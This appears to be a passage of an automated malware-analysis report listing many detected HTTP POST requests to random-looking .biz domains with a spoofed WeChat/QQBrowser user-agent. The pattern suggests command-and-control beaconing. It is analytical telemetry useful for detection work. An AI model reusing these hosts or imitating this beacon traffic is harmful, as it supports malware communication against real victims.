                    Source: global trafficHTTP traffic detected: POST /vmpbdjcltoiogmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /rijcpedf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /chlyqyudvbmqwoa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /gnudavhdnqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /adbpfonmgniatjqa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /jim HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /glbxptcheub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /divvtrnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ebkhufctagsugp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /we HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /rkobxpllgfpahuau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mucvuynxlubbk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /wrgpycaaholecau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mharo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bpcmdslghxxhg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /stqyahsrbymhoas HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /lakonfsatp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kvloellodiao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /usdujsihocn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qreituwftfkkmoci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /khex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /egrsifwbddhrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cwfkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ajjoevhbwow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vpr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dksfjxhedmgidb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /lelrjltwmlswd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jgidxganmacktd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /venn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /rqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nipbgjpspvtyfe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /px HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nsbfgtgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bhw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /eqkqtlekx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /shr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xdg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fhfpwltbvv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vibxotdbuqgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kgihefbgeqqddpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /squ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wkhnxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ymqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /agymgtakvgyrav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kuchnhalursvbkw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ffce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /cfywrdqxndo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xkbliseb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ftwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dfpdwbwsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dabmiwkjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jfojqnmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /oaviebkmaqfhvfw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /knymqarjimdb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /leiqqbxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tyysl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /arao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nfbfdhwgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /phpvxvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /llxpkbesjvfxqu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
